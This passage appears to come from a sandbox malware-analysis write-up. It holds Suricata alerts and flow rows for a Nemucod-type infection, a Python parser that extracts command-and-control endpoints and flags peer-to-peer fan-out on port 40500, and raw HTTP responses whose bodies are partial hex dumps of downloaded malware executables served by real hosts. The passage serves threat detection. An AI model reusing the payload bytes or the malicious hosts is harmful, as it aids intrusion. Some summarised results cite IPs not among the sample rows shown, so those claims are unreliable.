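Source: Network traffic | Suricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 91.202.233.141:80 -> 192.168.2.5:49715
Source: global traffic | TCP traffic: 192.168.2.5:49713 -> 203.188.251.78:40500
Source: global traffic | TCP traffic: 192.168.2.5:49586 -> 92.47.79.250:40500
Source: global traffic | TCP traffic: 192.168.2.5:49593 -> 90.156.161.103:40500
Source: global traffic | TCP traffic: 192.168.2.5:49597 -> 31.171.184.200:40500
Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 92.244.232.104:40500
Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 37.150.149.45:40500
Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 5.76.154.73:40500
Source: global traffic | UDP traffic: 192.168.2.5:65203 -> 213.206.61.226:40500
Source: global traffic | TCP traffic: 192.168.2.5:49579 -> 1.1.1.1:53
"""

# Both patterns are searched (not anchored), so a fused "trafficSuricata IDS:"
# cell parses the same as a separated one.
ALERT_RE = re.compile(
    r"Suricata IDS: (?P<sid>\d+) - Severity (?P<sev>\d+) - (?P<msg>.+?) : "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)")
FLOW_RE = re.compile(
    r"(?P<proto>TCP|UDP) traffic: (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+)")

ANALYSIS_HOST = "192.168.2.5"        # the sandbox VM, from the report
WELL_KNOWN_PORTS = {53, 80, 123, 443}  # assumption: ports not treated as P2P


def parse_lines(text):
    """Split report rows into Suricata alert dicts and raw flow dicts."""
    alerts, flows = [], []
    for line in text.splitlines():
        m = ALERT_RE.search(line)
        if m:
            d = m.groupdict()
            d["sid"], d["sev"] = int(d["sid"]), int(d["sev"])
            alerts.append(d)
            continue
        m = FLOW_RE.search(line)
        if m:
            flows.append(m.groupdict())
    return alerts, flows


def c2_by_signature(alerts, analysis_host=ANALYSIS_HOST):
    """Unique remote endpoints per signature ID. The remote side is whichever
    end is not the analysis VM, so the inbound Nemucod 'downloading' rule
    (server -> VM) still yields the server, not the VM's ephemeral port."""
    out = defaultdict(lambda: {"msg": None, "remote": set()})
    for a in alerts:
        if a["src"] == analysis_host:
            remote = f"{a['dst']}:{a['dport']}"
        else:
            remote = f"{a['src']}:{a['sport']}"
        out[a["sid"]]["msg"] = a["msg"]
        out[a["sid"]]["remote"].add(remote)
    return {sid: {"msg": v["msg"], "remote": sorted(v["remote"])}
            for sid, v in out.items()}


def p2p_fanout(flows, min_peers=4):
    """Flag (proto, dst_port) pairs where the host reaches many distinct peers
    on a non-standard port. fixed_source_port is True when every flow left
    from one local port, i.e. a socket the process bound itself (its own P2P
    listener) rather than kernel-assigned ephemeral ports."""
    groups = defaultdict(lambda: {"peers": set(), "sports": set()})
    for f in flows:
        g = groups[(f["proto"], int(f["dport"]))]
        g["peers"].add(f["dst"])
        g["sports"].add(int(f["sport"]))
    findings = []
    for (proto, dport), g in sorted(groups.items()):
        if dport in WELL_KNOWN_PORTS or len(g["peers"]) < min_peers:
            continue
        findings.append({"proto": proto, "dst_port": dport,
                         "peer_count": len(g["peers"]),
                         "fixed_source_port": len(g["sports"]) == 1})
    return findings


if __name__ == "__main__":
    alerts, flows = parse_lines(SAMPLE_LINES)
    for sid, v in c2_by_signature(alerts).items():
        print(sid, v["msg"], v["remote"])
    for finding in p2p_fanout(flows):
        print(finding)
```

    On the sample rows this yields 45.93.20.18:80 and 91.202.233.141:80 under SID 2848295, 185.215.113.66:80 under 2853292, and two fan-out findings on port 40500: TCP with ephemeral source ports and UDP from the single bound port 65203. Blocking the three HTTP hosts cuts off payload retrieval; the fan-out finding is what catches a rebuilt sample whose C2 hosts have moved, so it belongs in flow-based detection rather than in an IP blocklist.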
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:53:55 GMTContent-Type: application/octet-streamContent-Length: 89600Last-Modified: Sat, 08 Mar 2025 13:08:27 GMTConnection: keep-aliveETag: "67cc414b-15e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4e 53 c8 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e6 00 00 00 86 00 00 00 00 00 00 00 77 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 26 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 e4 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 36 00 00 00 
00 01 00 00 38 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 4d 00 00 00 40 01 00 00 3c 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:11 GMTContent-Type: application/octet-streamContent-Length: 51712Last-Modified: Sat, 11 Jan 2025 02:20:42 GMTConnection: keep-aliveETag: "6781d57a-ca00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2f 02 0b 02 06 00 00 16 00 00 00 60 00 00 00 00 00 00 fa 22 00 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 00 00 00 04 00 00 61 d9 00 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 8b 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 8b 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 14 00 00 00 10 00 00 00 16 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 5d 00 00 00 30 00 00 00 5e 00 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 ac 0f 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 70 64 61 74 61 00 00 90 00 00 00 00 a0 00 00 00 02 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:17 GMTContent-Type: application/octet-streamContent-Length: 29184Last-Modified: Sat, 11 Jan 2025 02:20:42 GMTConnection: keep-aliveETag: "6781d57a-7200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 95 d2 6a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 1a 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5c 18 00 00 00 20 00 00 00 1a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 90 04 00 00 00 40 00 00 00 06 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 48 00 00 00 02 00 05 00 c4 24 00 00 98 13 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 03 00 8f 00 00 00 00 00 00 00 28 0a 00 00 06 de 03 26 de 00 72 01 00 00 70 72 09 00 00 70 28 02 00 00 06 de 03 26 de 00 20 b8 0b 00 00 28 05 00 00 0a 1f 28 28 06 00 00 0a 72 de 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 23 28 06 00 00 0a 72 de 00 00 70 28 07 00 00 0a 28 08 00 00 0a 28 09 00 00 0a 72 1a 01 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 24 28 06 00 00 0a 72 3c 01 00 70 72 1a 01 00 70 28 0a 00 00 0a 28 08 00 00 0a de 03 26 de 00 16 28 0b 00 00 0a 2a 00 01 28 00 00 00 00 00 00 07 07 00 03 01 00 00 01 00 00 0a 00 11 1b 00 03 01 00 00 01 00 00 28 00 5d 85 00 03 01 00 00 01 1b 30 02 00 3a 00 00 00 01 00 00 11 73 0c 00 00 0a 0a 06 02 6f 0d 00 00 0a 06 03 6f 0e 00 00 0a 06 28 0f 00 00 0a 6f 10 00 00 0a 06 17 6f 11 00 00 0a 06 17 6f 12 00 00 0a 06 28 13 00 00 0a 26 de 03 26 de 00 2a 00 00 01 10 00 00 00 00 00 00 36 36 00 03 01 00 00 01 1b 30 03 00 50 00 00 00 02 00 00 11 02 0a 06 69 28 15 00 00 0a 0b 2b 13 06 18 6a 5a 0a 07 28 16 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:22 GMTContent-Type: application/octet-streamContent-Length: 8704Last-Modified: Thu, 06 Mar 2025 08:45:12 GMTConnection: keep-aliveETag: "67c96098-2200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 02 68 c8 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 1a 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 18 00 00 00 20 00 00 00 1a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 90 04 00 00 00 40 00 00 00 06 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 48 00 00 00 02 00 05 00 c4 24 00 00 80 13 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 03 00 8f 00 00 00 00 00 00 00 28 0a 00 00 06 de 03 26 de 00 72 01 00 00 70 72 09 00 00 70 28 02 00 00 06 de 03 26 de 00 20 b8 0b 00 00 28 05 00 00 0a 1f 28 28 06 00 00 0a 72 ca 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 23 28 06 00 00 0a 72 ca 00 00 70 28 07 00 00 0a 28 08 00 00 0a 28 09 00 00 0a 72 fe 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 24 28 06 00 00 0a 72 20 01 00 70 72 fe 00 00 70 28 0a 00 00 0a 28 08 00 00 0a de 03 26 de 00 16 28 0b 00 00 0a 2a 00 01 28 00 00 00 00 00 00 07 07 00 03 01 00 00 01 00 00 0a 00 11 1b 00 03 01 00 00 01 00 00 28 00 5d 85 00 03 01 00 00 01 1b 30 02 00 3a 00 00 00 01 00 00 11 73 0c 00 00 0a 0a 06 02 6f 0d 00 00 0a 06 03 6f 0e 00 00 0a 06 28 0f 00 00 0a 6f 10 00 00 0a 06 17 6f 11 00 00 0a 06 17 6f 12 00 00 0a 06 28 13 00 00 0a 26 de 03 26 de 00 2a 00 00 01 10 00 00 00 00 00 00 36 36 00 03 01 00 00 01 1b 30 03 00 50 00 00 00 02 00 00 11 02 0a 06 69 28 15 00 00 0a 0b 2b 13 06 18 6a 5a 0a 07 28 16 00 0
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:27 GMTContent-Type: application/octet-streamContent-Length: 8704Last-Modified: Mon, 03 Jun 2024 23:16:30 GMTConnection: keep-aliveETag: "665e4ece-2200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 5c 36 b8 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 1a 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 98 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 18 00 00 00 20 00 00 00 1a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 04 00 00 00 40 00 00 00 06 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 48 00 00 00 02 00 05 00 c4 24 00 00 64 13 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 03 00 8f 00 00 00 00 00 00 00 28 0a 00 00 06 de 03 26 de 00 72 01 00 00 70 72 09 00 00 70 28 02 00 00 06 de 03 26 de 00 20 b8 0b 00 00 28 05 00 00 0a 1f 28 28 06 00 00 0a 72 ba 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 23 28 06 00 00 0a 72 ba 00 00 70 28 07 00 00 0a 28 08 00 00 0a 28 09 00 00 0a 72 e4 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 24 28 06 00 00 0a 72 06 01 00 70 72 e4 00 00 70 28 0a 00 00 0a 28 08 00 00 0a de 03 26 de 00 16 28 0b 00 00 0a 2a 00 01 28 00 00 00 00 00 00 07 07 00 03 01 00 00 01 00 00 0a 00 11 1b 00 03 01 00 00 01 00 00 28 00 5d 85 00 03 01 00 00 01 1b 30 02 00 3a 00 00 00 01 00 00 11 73 0c 00 00 0a 0a 06 02 6f 0d 00 00 0a 06 03 6f 0e 00 00 0a 06 28 0f 00 00 0a 6f 10 00 00 0a 06 17 6f 11 00 00 0a 06 17 6f 12 00 00 0a 06 28 13 00 00 0a 26 de 03 26 de 00 2a 00 00 01 10 00 00 00 00 00 00 36 36 00 03 01 00 00 01 1b 30 03 00 50 00 00 00 02 00 00 11 02 0a 06 69 28 15 00 00 0a 0b 2b 13 06 18 6a 5a 0a 07 28 16 00 0
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:33 GMTContent-Type: application/octet-streamContent-Length: 8704Last-Modified: Sat, 08 Apr 2023 06:04:36 GMTConnection: keep-aliveETag: "643103f4-2200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 02 68 c8 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 1a 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 18 00 00 00 20 00 00 00 1a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 90 04 00 00 00 40 00 00 00 06 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 48 00 00 00 02 00 05 00 c4 24 00 00 80 13 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 03 00 8f 00 00 00 00 00 00 00 28 0a 00 00 06 de 03 26 de 00 72 01 00 00 70 72 09 00 00 70 28 02 00 00 06 de 03 26 de 00 20 b8 0b 00 00 28 05 00 00 0a 1f 28 28 06 00 00 0a 72 ca 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 23 28 06 00 00 0a 72 ca 00 00 70 28 07 00 00 0a 28 08 00 00 0a 28 09 00 00 0a 72 fe 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 24 28 06 00 00 0a 72 20 01 00 70 72 fe 00 00 70 28 0a 00 00 0a 28 08 00 00 0a de 03 26 de 00 16 28 0b 00 00 0a 2a 00 01 28 00 00 00 00 00 00 07 07 00 03 01 00 00 01 00 00 0a 00 11 1b 00 03 01 00 00 01 00 00 28 00 5d 85 00 03 01 00 00 01 1b 30 02 00 3a 00 00 00 01 00 00 11 73 0c 00 00 0a 0a 06 02 6f 0d 00 00 0a 06 03 6f 0e 00 00 0a 06 28 0f 00 00 0a 6f 10 00 00 0a 06 17 6f 11 00 00 0a 06 17 6f 12 00 00 0a 06 28 13 00 00 0a 26 de 03 26 de 00 2a 00 00 01 10 00 00 00 00 00 00 36 36 00 03 01 00 00 01 1b 30 03 00 50 00 00 00 02 00 00 11 02 0a 06 69 28 15 00 00 0a 0b 2b 13 06 18 6a 5a 0a 07 28 16 00 0
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:38 GMTContent-Type: application/octet-streamContent-Length: 29184Last-Modified: Sat, 11 Jan 2025 02:20:42 GMTConnection: keep-aliveETag: "6781d57a-7200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 21 5a 68 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 18 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 